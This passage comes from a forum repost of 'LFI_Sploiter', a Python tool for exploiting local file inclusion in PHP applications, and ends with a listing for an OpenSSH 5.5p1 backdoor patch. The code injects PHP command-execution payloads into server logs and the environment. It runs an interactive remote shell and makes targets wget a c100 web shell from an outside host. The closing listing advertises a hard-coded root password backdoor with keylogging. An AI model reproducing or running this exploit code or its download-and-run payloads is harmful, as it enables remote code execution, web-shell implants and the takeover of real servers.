nullorno.lower() if nullorno == 'n': myurl = url + fds[fd] print("Injecting code into file descriptor: %s" %(myurl)) try: exploit_lfi(myurl) except IOError as e: print("Error codes connecting to server: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': myurl = url + fds[fd] + nullbyte print("Injecting code into file descriptor: %s" %(myurl)) try: exploit_lfi(myurl) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: option_error() elif option == "6": url = str(raw_input("Site and uri to attack?: ")) if url[:7] != "http://": url = "http://"+url else: url = url print("Cleaning up old html files") try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") nullorno = str(raw_input("Use a nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'n': for log in logs: myurl = url + step + log print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'y': for log in logs: myurl = url + step + log print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: option_error() sys.exit(1) elif option == "7": print("\n\n1)Inject code in a specific Log?") print("2)Include all logs and inject code(a LFI hail mary(very noisy!))?: ") what_to_do = str(raw_input("Option:")) if what_to_do == "1": url = str(raw_input("Site were working with: ")) if url[:7] != "http://": url = "http://"+url else: url = url logfile = str(raw_input("Logfile to inject code into?: ")) null = str(raw_input("Add a nullbyte(y or n):" )) if null == "n": myurl = url + step + logfile print("Attempting to inject code into logfile: %s" %(logfile) ) try: exploit_lfi(myurl) except IOError as e: print("Error 
injecting code into %s\n ERROR: %s" %(logfile, e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif null == "y": myurl = url + step + logfile + null print("Attempting to inject code into logfile: %s" %(logfile) ) try: exploit_lfi(myurl) except IOError as e: print("Error injecting code into %s\n ERROR: %s" %(logfile, e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: option_error() sys.exit(1) if what_to_do == "2": warn = str(raw_input("Warning: This is a noisy scan that makes alot of requests,exit?(y or n)")) if warn == "y": sys.exit(1) elif warn == "n": url = str(raw_input("Site were working with: ")) if url[:7] != "http://": url = "http://"+url else: url = url null = str(raw_input("Add a nullbyte(y or n):" )) if null == "n": for log in logs: myurl = url + step + log print("Attempting to inject code into logfile: %s" %(log)) try: exploit_lfi(myurl) except IOError as e: print("Error injecting code into %s\n ERROR: %s" %(log, e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: pass elif option == "8": os.system('clear') print("+==+==+==+==+==+[+]OS Environ/FD/Logfile Shell environment[+]==+==+==+==+==+\n\n") url = str(raw_input("Fully Exploited url?: ")) if url[:7] != "http://": url = "http://"+url else: url = url while 1: try: command_shell(url) except IOError as e: print("Error executing command. Code: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "9": b64file = "b64_encoded_stream.txt" print "Warning: allow_url_include must be enabled for this attack to succeed!" 
url = str(raw_input("Url to exploit?: ")) if url[:7] != "http://": url = "http://"+url else: url = url read = str(raw_input("PHP File to attempt to read or include(ie config.php)")) sploit = "php://filter/convert.base64-encode/resource=" myurl = url + sploit + read try: req = urllib2.Request(myurl) req.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)') req.add_header('Keep-Alive: ','115') req.add_header('Referer: ','http://'+url) response = urllib2.urlopen(req, timeout=10) pointer = response with open(htmlfile , 'a') as PHPOBJ: PHPOBJ.writelines("<b>PHPStream url: %s</b>" %(myurl)) PHPOBJ.writelines(pointer) if PHPOBJ.writelines(pointer): B64.b64decode(pointer) print("Decoded Base 64 streams have been written to %s" %(b64file)) else: pass except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif option == "10": htmlfile = "LFI_fuzz_custom.html" url = str(raw_input("Site to scan: ")) if url[:7] != "http://": url = "http://"+url else: url = url print("Cleaning up old html files") try: cleanup(htmlfile) print("Old files removed, ready to start a new scan") except: print("Ready to start a new scan..") step = str(raw_input("Custom step to dump application data?(Step meaning ../ ..\ ..// : ")) nullorno = str(raw_input("Scan with nullbyte(y or n):")) nullorno = nullorno.lower() if nullorno == 'y': for fuzz in fuzzer: myurl = url + fuzz + nullbyte print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) elif nullorno == 'n': for lfi in lfi_load: myurl = url + step + lfi print("Attempting to include: %s" %(myurl)) try: scanner(myurl,url,htmlfile) except IOError as e: print("Error codes: %s" %(e)) except KeyboardInterrupt: print("Bye :)") sys.exit(1) else: pass elif option == "11": banner() info() elif option == "12": print("Bye \nCome back and see me anytime :)") 
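# NOTE(review): the first lines below are the tail of main() - the last branch of
# the if/elif chain on `option` that it closes begins before this excerpt, so the
# indentation here is a best guess (main() body at 4 spaces, branch bodies at 8).
# The `else` re-enters main() so an unrecognised option simply re-prompts.
        sys.exit(0)
    else:
        try:
            main()
        except IndexError:
            print("Random text for error handling")
        except KeyboardInterrupt:
            print("Bye ")
#############################################################Functions start here#####################################################################
#
# Everything below issues live HTTP requests that plant PHP code on the target;
# run it only against systems you are explicitly authorised to test.

# Header values shared by the request helpers.  The header *names* are kept
# exactly as the original tool sends them: each carries a trailing ": " and
# "UserAgent" is not the standard "User-Agent" spelling, so urllib2 emits them
# as written.  Confirm on the wire (against a server you control) which request
# field the payload actually lands in before relying on a particular log.
_SCAN_USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
_REQUEST_TIMEOUT = 10

# Five PHP command-execution stubs.  All five are injected so that a target with
# some of these functions disabled (php.ini disable_functions) may still run one.
_LFI_PAYLOADS = [
    '<?php system($_REQUEST["cmd"]);?>',
    '<?php shell_exec($_REQUEST["cmd"]);?>',
    '<?php eval($_REQUEST["cmd"]);?>',
    '<?php exec($_REQUEST["cmd"]);?>',
    '<?php passthru($_REQUEST["cmd"]);?>',
]

# Payloads for the /proc/self/environ variant.  Each makes the target fetch a
# third-party "c100" web shell and save it as lol.php.  Two cautions: the shell
# is pulled from a host the operator does not control (publicly circulated
# c99/c100 shells are widely reported to carry backdoors of their own), and the
# first entry is reproduced verbatim - it uses the PHP short open tag and has a
# stray trailing ')' outside the tag.
_ENVIRON_PAYLOADS = [
    "<? system('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php')?>)",
    "<?php shell_exec('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>",
    "<?php eval('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>",
    "<?php exec('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>",
    "<?php passthru('wget http://www.xfocus.net.ru/soft/c100.txt -O lol.php');?>",
]


def _send(url, user_agent, referer):
    """Issue one GET for `url` with the tool's fixed header set.

    `user_agent` goes into the (mis-spelled) user-agent header; the Referer is
    always "http://" + `referer`, even when `referer` already carries a scheme,
    exactly as the original did.  Returns the urllib2 response object; raises
    IOError (urllib2.URLError derives from it) on failure.
    """
    req = urllib2.Request(url)
    req.add_header('UserAgent: ', user_agent)
    req.add_header('Keep-Alive: ', '115')
    req.add_header('Referer: ', 'http://' + referer)
    return urllib2.urlopen(req, timeout=_REQUEST_TIMEOUT)


def _clear_screen():
    """Clear the terminal with the platform's native command."""
    if sys.platform == "linux" or sys.platform == "linux2":
        os.system('clear')
    else:
        os.system('cls')


def scanner(url, base, outfile):
    """Request `url` once and append the raw response to the HTML report `outfile`.

    `base` is the site root, used only to build the Referer header.  Raises
    IOError on connection failure; the callers in main() catch it.  The response
    body is streamed straight into the file and is not returned.
    """
    response = _send(url, _SCAN_USER_AGENT, base)
    with open(outfile, 'a') as report:
        report.write("<b>Query Used: %s</b>" % (url))
        # writelines() iterates the response object line by line, consuming it;
        # a second pass over `response` would write nothing.
        report.writelines(response)
    # The original tested the (always None) return value of writelines(), so this
    # confirmation never printed.  Report after the write has completed instead.
    print("Html pages and responses have been written to %s" % (outfile))


def cleanup(file):
    """Delete the previous report `file`.

    Raises OSError if it does not exist; main() wraps the call in a bare
    try/except and carries on with a fresh scan.
    """
    print("Clearing old files before starting a new scan")
    os.remove(file)


def option_error():
    """Tell the user the menu choice was invalid and show the usage text."""
    print("\t\t\t[--]Option error![--]\n\n\t\t[+]Please choose an offered option or exit![+]")
    usage()


def banner():
    """Clear the screen and print the tool banner."""
    _clear_screen()
    print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+")
    print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+")
    print("+==+==+==+==+==+ LFI Fuzzer/Exploiter/Log Includer/Shell +==+==+==+==+==+==+==+")
    print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+")
    print("+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+")
    print("codes by nullbyt3")


def exploit_lfi(url):
    """Log-poisoning step: send five requests to `url`, each carrying one PHP
    stub from _LFI_PAYLOADS in the user-agent header, so that a later inclusion
    of the web-server log executes it.

    Stops at the first request that raises IOError (callers catch it).  Nothing
    is returned and the responses are not read.
    """
    for payload in _LFI_PAYLOADS:
        _send(url, payload, url)
    print("Code has been injected in a total of 5 requests!\nIf all went well you may have a shell waiting for you here:\n\n%s&&cmd={INJECT CODE HERE}" % (url))


def command_shell(site):
    """Prompt once for a command and request `site` + "&&cmd=" + command.

    main() loops on this function.  The command is appended without URL
    encoding, so spaces and metacharacters reach urllib2 exactly as typed.
    NOTE(review): as in the original, what is printed is the response object's
    repr, not the response body.
    """
    end = "&&cmd="
    cmd = str(raw_input("shell~$: "))
    if not cmd:
        print("Error executing command. Check for the shell manually")
        return
    try:
        mycmd = site + end + cmd
        print("injecting %s" % (cmd))
        req = urllib2.Request(mycmd)
        response = urllib2.urlopen(req, timeout=_REQUEST_TIMEOUT)
        print("Command response: %s" % (response))
    except IOError as e:
        print("Error: %s" % (e))
    except KeyboardInterrupt:
        print("Bye :)")
        sys.exit(1)


def exploit_environ(url):
    """/proc/self/environ variant: send the five _ENVIRON_PAYLOADS to `url` in
    the user-agent header so that including the environ file runs the wget.

    Same error behaviour as exploit_lfi(): the first IOError propagates.  See the
    caution on _ENVIRON_PAYLOADS about what the payload actually downloads.
    """
    for payload in _ENVIRON_PAYLOADS:
        _send(url, payload, url)
    print("Done in 5 requests.\n\nIf all went well c100 shell should be available in root folder named lol.php: %s/lol.php" % (url))


def info():
    """Print the tool's about text."""
    print("""\n\n\tLFI_Sploiter is a simple tool to help in the fuzzing for, finding,and exploiting local file inclusions in Linux based PHP applications. 
Using special encoding and fuzzing techniques lfi_sploiter will scan for some known and some not so known LFI filter bypasses and exploits using some advanced encoding/bypass methods to try to bypass security and achieve its goal which is ultimately, exploiting a Local file inclusion.\n\n In adittion to LFI_Sploiter\'s fuzzing and encoding techniques it also has built in methods for LFI exploitation including /proc/self/environ shell exploit, File descriptor shell and LFI shell via log injection. LFI_Sploiter injects code using different command injection functions in the event that certain functions are disabled\n\n All codes written by nullbyt3 of securityoverride.com or 206.214.216.120/news.php. Report all bugs to nullbyt3@safe-mail.net Respect to TurboBorland, PublicEnemy, CrashOverron, bluechill, Teddy and many more from securityoverride who help me to stay in the game and keep spitting out code\n\n""")


def usage():
    """Print the one-line usage text (the tool is menu driven; no arguments)."""
    print("==+==+==+==+==+==+==+==+==+==+==+=USAGE HERE=+==+==+==+==+==+==+==+==+==+==+==+")
    print("\t\t\troot@h@x0r~$%s " % (sys.argv[0]))
    print("==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+===+")
    print("Directions: To simply run the scan and follow the prompts ")


if __name__ == '__main__':
    _clear_screen()
    sys.exit(main())

Download: http://packetstormsecurity.org/files/download/106912/LFI_fuzzploit-1.1.tar.gz
Sursa: Comments ≈ Packet Storm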
  25. OpenSSH 5.5p1 Backdoor Authored by IPSECS This is a patch for OpenSSH version 5.5p1 that adds a hard-coded ("magic") root password backdoor and also keylogs. Download: http://packetstormsecurity.org/files/download/106930/openssh-5.5p1.patch.tar.gz Sursa: OpenSSH 5.5p1 Backdoor ≈ Packet Storm